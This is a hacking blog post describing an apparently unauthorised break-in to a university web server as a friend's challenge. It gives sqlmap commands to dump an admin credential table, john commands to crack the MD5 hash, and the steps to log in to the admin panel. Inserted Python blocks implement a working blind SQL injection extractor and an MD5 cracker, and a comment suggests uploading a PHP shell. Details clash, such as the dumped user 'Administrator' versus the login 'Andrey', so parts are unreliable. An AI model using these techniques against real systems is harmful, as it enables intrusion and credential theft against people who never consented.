Scenario a1


Hello everybody, and welcome to the first post on this blog :).



Two weeks ago I received an e-mail from a friend asking me, as a challenge, to penetrate a university server that hosts more than 100 websites associated with each other. At first I thought he was joking :P, but I accepted the challenge and asked him to send me the site name.

I took the matter seriously and started thinking: where to begin?
Which tools could be used? Is the server affected by any kind of bug at all? Simply put, let's make some noise ;).

Before doing anything, I'd like to mention two opinions of mine:

1 - In information security there is no place for impatient people. If you get past the first step, the second should be possible to overcome, and so should the rest. Don't say "I'm bored"; try harder :) or go eat some cornflakes by yourself :P.

2 - Penetration testing has no restrictions, just be creative. Any firewall, IDS, AV or filtering technique can be broken; if not, go to your roommate, look in the mirror, open your eyes and whistle like you don't care :0.

Also, all the commands and images in this tutorial were produced on a Kali Linux distribution.


Let's start with a quick scan of the IP using the Acunetix scanner; take a look at the image below:

The web server is nginx/1.4.1; no Apache server appears to be running at all (it might be, behind it).
Another try via the www.netcraft.com website might give us other results:

The OS is Linux-based. So far so good; let's move to the next step, which is finding as many vulnerabilities as possible: SQLi, XSS and so on.

I have the site name but I can't disclose it, to prevent any kind of sabotage, because this post is tutorial material for educational purposes only.

However, while navigating around the server I found a website affected by two well-known vulnerabilities, both in the OWASP Top 10: SQLi and XSS. Take a look:

It looks very interesting, and many would say "game over", but not yet; let's see what comes next:

Marvellous. Now we have two issues to choose from. If you want to attack the site through the XSS vulnerability, that is your choice; pentesters today are very familiar with this kind of attack, and JavaScript-based payloads are the natural fit for it. Or you can use the SQLi for quick and more reliable results. Despite the strength of both, SQLi is still the most popular attack from the information security perspective.

Very well. Here you have two choices: inject the parameter by hand, or automate the process with a tool such as sqlmap.

In this post I am going to use sqlmap for the mission. Let me first ask Kali for help: "Kali, would you please help us here while we do a penetration testing job?" "Definitely yes, they made me for this purpose, buddies :)" "Thanks a lot Kali, you are the best of the best."
Hhhhe ;).

So, we have permission; now let's get down to serious work:

Very nice, we've got an injectable parameter. The DBMS is MySQL 5.0.11, the language is PHP 5.2.6 and the web server banner is nginx. Good; now let's enumerate the databases:

We've got two databases:
1 - information_schema
2 - user1151_lgxrt2
The second is the important one (information_schema is MySQL's own metadata catalogue and is present on every server). Now let's enumerate its tables; simply type this command:

sqlmap -u "http" -D user1151_lgxrt2 --tables

(--dbs lists all the databases, which is the step shown above; -D selects one of them and --tables lists its tables. The URL is the same vulnerable one sqlmap tested in the first run.)

As shown above, we can now see the tables. The one marked with the red arrow is the important one; let's see its columns:

So far so good. Those are the nex_autentification columns, but we are interested in just three of them:

ify_id
ify_reg_user
ify_reg_pass

Ok, time to dump the column data. Very simple, just type the following command:

sqlmap -u "http" -D user1151_lgxrt2 -T nex_autentification --dump --time-sec=1

(The database name must match the one enumerated above, user1151_lgxrt2. --time-sec=1 makes the time-based blind payloads sleep for one second instead of the default five, which speeds the dump up but makes false results more likely on a jittery link; to fetch only the three columns we care about, add -C ify_id,ify_reg_user,ify_reg_pass.)

Wonderful!! The administrator's data has been completely exposed:

Id : 2
User : Administrator
Pass : b335044809c08dfc082baac961426676
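Added example, my own code and not part of the original post: a Python simulation of what sqlmap is doing behind the screenshots above, from the injectable parameter to the dumped row. A hypothetical page handler builds its query by string concatenation and reveals only whether a row came back; a boolean-based blind routine recovers the admin row from that one bit per request, character by character, the way sqlmap's blind techniques do; and the same routine run against a parameterised version of the handler recovers nothing. The table and column names are the ones enumerated above; the rows, the handler and the use of SQLite in place of MySQL are assumptions made for the demo.

```python
import sqlite3

# Constructed stand-in for the target's database (an assumption for this demo):
# table and column names are the ones sqlmap enumerated in the post, the rows
# are made up, and row 2 carries the hash the post's --dump showed.
SCHEMA = """
CREATE TABLE nex_autentification (
    ify_id       INTEGER PRIMARY KEY,
    ify_reg_user TEXT NOT NULL,
    ify_reg_pass TEXT NOT NULL
);
INSERT INTO nex_autentification VALUES (1, 'editor', '0cc175b9c0f1b6a831c399e269772661');
INSERT INTO nex_autentification VALUES (2, 'Administrator', 'b335044809c08dfc082baac961426676');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_page(conn: sqlite3.Connection, page_id: str) -> bool:
    """Hypothetical handler for a URL like news.php?id=N. The parameter is
    glued straight into the SQL (the bug), and the caller learns only whether
    a row came back, which is all a boolean-based blind attack needs."""
    sql = "SELECT ify_id FROM nex_autentification WHERE ify_id = " + page_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_page(conn: sqlite3.Connection, page_id: str) -> bool:
    """The same handler fixed: check the type, then bind the value as a query
    parameter so it is never parsed as SQL."""
    try:
        row_id = int(page_id)
    except ValueError:
        return False
    row = conn.execute(
        "SELECT ify_id FROM nex_autentification WHERE ify_id = ?", (row_id,)
    ).fetchone()
    return row is not None


class Oracle:
    """Counts requests so the cost of a blind dump is visible; with a
    time-based technique each of these would cost --time-sec seconds."""

    def __init__(self, handler):
        self.handler = handler
        self.requests = 0

    def __call__(self, param: str) -> bool:
        self.requests += 1
        return self.handler(param)


def bisect_true(oracle, make_payload, lo: int, hi: int) -> int:
    """Return the value v in [lo, hi] such that oracle(make_payload(n)) is
    true exactly when v > n, using about log2(hi - lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(make_payload(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle, column: str, row_id: int, max_len: int = 255) -> str:
    """Recover one field of one row the way sqlmap's boolean-based blind
    technique does: first its length, then each character by bisection on
    its code point. unicode()/substr() are the SQLite spellings; on MySQL
    sqlmap uses ORD()/MID() for the same job."""
    length = bisect_true(
        oracle, lambda n: f"{row_id} AND length({column}) > {n}", 0, max_len
    )
    chars = []
    for pos in range(1, length + 1):
        code = bisect_true(
            oracle,
            lambda n, p=pos: f"{row_id} AND unicode(substr({column},{p},1)) > {n}",
            0, 127,
        )
        chars.append(chr(code))
    return "".join(chars)


def dump_admin(conn: sqlite3.Connection, handler) -> dict:
    """Dump the two interesting columns of row 2 through the given handler."""
    oracle = Oracle(lambda p: handler(conn, p))
    return {
        "user": blind_extract(oracle, "ify_reg_user", 2),
        "pass": blind_extract(oracle, "ify_reg_pass", 2),
        "requests": oracle.requests,
    }


if __name__ == "__main__":
    db = make_db()
    print(dump_admin(db, vulnerable_page))  # user, hash and the request count
    print(dump_admin(db, safe_page))        # nothing leaks, only wasted requests
```

The request counter is the point of the `--time-sec` caveat: a 32-character hash costs roughly 7 requests per character plus a few for the length, and with a time-based technique every one of those requests has to wait the configured delay, which is why sqlmap prefers boolean or error-based channels when the page offers one.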

Last but not least, we need to crack the admin hash, which is an unsalted MD5 (32 hex characters). Out of thousands of options, you have three common ways to crack this type of hash:

1- john the ripper
2- rainbow tables
3- online websites (bear in mind that this hands the hash to a third party, which is not acceptable on a real engagement)


If you want to crack it with john, put the MD5 hash in a file, save it, and type the following in your terminal:

john --format=raw-md5 file

(Without further options john runs its default modes; --wordlist=<file> points it at a dictionary instead.) The second way is rainbow tables. Their drawback is the huge size of the tables, which can exceed 10 GB each, despite their reliability; go and browse this website:

https://www.freerainbowtables.com/  .
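Added example, my own code and not the post's: a small Python equivalent of the two offline options just listed, a john-style guess-and-compare loop and a precomputed lookup table in the spirit of rainbow tables, run over a constructed wordlist with simple mangling rules. The wordlist and rules are assumptions (john's own are far larger); the post's hash is fed in only to show the call, and the example does not claim which plaintext it resolves to.

```python
import hashlib
import itertools

# Constructed wordlist and mangling rules (an assumption for this demo; john's
# own rules and wordlists are far larger). The password the post recovered,
# enigma390, is a dictionary word plus a short digit suffix, exactly the shape
# these rules generate.
WORDLIST = ["admin", "password", "enigma", "university", "qwerty"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def candidates(words=WORDLIST):
    """Yield guesses: each word as-is, Capitalised and UPPER, each with no
    suffix or with a 1- to 3-digit suffix (1 + 10 + 100 + 1000 per form)."""
    for word in words:
        for base in (word, word.capitalize(), word.upper()):
            yield base
            for width in range(1, 4):
                for digits in itertools.product("0123456789", repeat=width):
                    yield base + "".join(digits)


def crack(target_hex: str, words=WORDLIST):
    """What john does with raw-md5: hash every guess and compare. Unsalted
    MD5 is fast and deterministic, so nothing slows this down except the
    size of the candidate space. Returns the plaintext or None."""
    target = target_hex.strip().lower()
    for guess in candidates(words):
        if md5_hex(guess) == target:
            return guess
    return None


def build_lookup(words=WORDLIST) -> dict:
    """The idea behind rainbow tables, without the chain compression that
    keeps real tables down to gigabytes: hash every candidate once, then
    answer any number of later lookups in O(1). A per-user salt defeats this,
    because the table would have to be rebuilt for every salt value."""
    return {md5_hex(guess): guess for guess in candidates(words)}


def crack_many(target_hexes, table: dict) -> dict:
    """Resolve a batch of hashes against a prebuilt table."""
    return {h: table.get(h.strip().lower()) for h in target_hexes}


if __name__ == "__main__":
    post_hash = "b335044809c08dfc082baac961426676"  # the hash from the post's dump
    print("john-style:", crack(post_hash))  # plaintext if inside the candidate space, else None
    table = build_lookup()
    print("table size:", len(table))
    print("table lookup:", crack_many([post_hash, md5_hex("Admin123")], table))
```

The two functions trade time for space: `crack` recomputes every hash per target, `build_lookup` pays the hashing once and then answers each target with a dictionary lookup, which is why one big table can serve every unsalted MD5 a tester ever dumps and why a salt is the fix on the defender's side.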


However, let's crack the hash and see the result:

Alright guys, it says it resolves to "enigma390". We've done half of the job; now we hold a cracked MD5. So the user, if you remember, is "Andrey" and the password is "enigma390". Let's spider the host to find the admin login page; use your own tools, it doesn't matter, they all give the same result. This image is from the Havij program:

But when I opened the URL path, it turned out to be a phpMyAdmin page; take a look at this:

I tried every way I could think of to find the admin page, and then suddenly I had an idea. Remember when we were injecting the parameter and saw all the tables, columns and data? It occurred to me that the prefix shared by the table names is also the path of the admin page, and here is the proof:

Voilaaaaaa :), magnificent. Let's log in using the previous data:

User : Andrey
Pass : enigma390

That's it guys, we've seen a very modest scenario.

Next time I'll show you how to compromise the server by hijacking an SSL login account. See you soon, to be continued :).


Comments

Artem Bachevky said…
That whole CMS is busted, like all of that studio's products. RCE in every product)
Unknown said…
Yes, you can also upload a PHP shell script for remote command execution ;)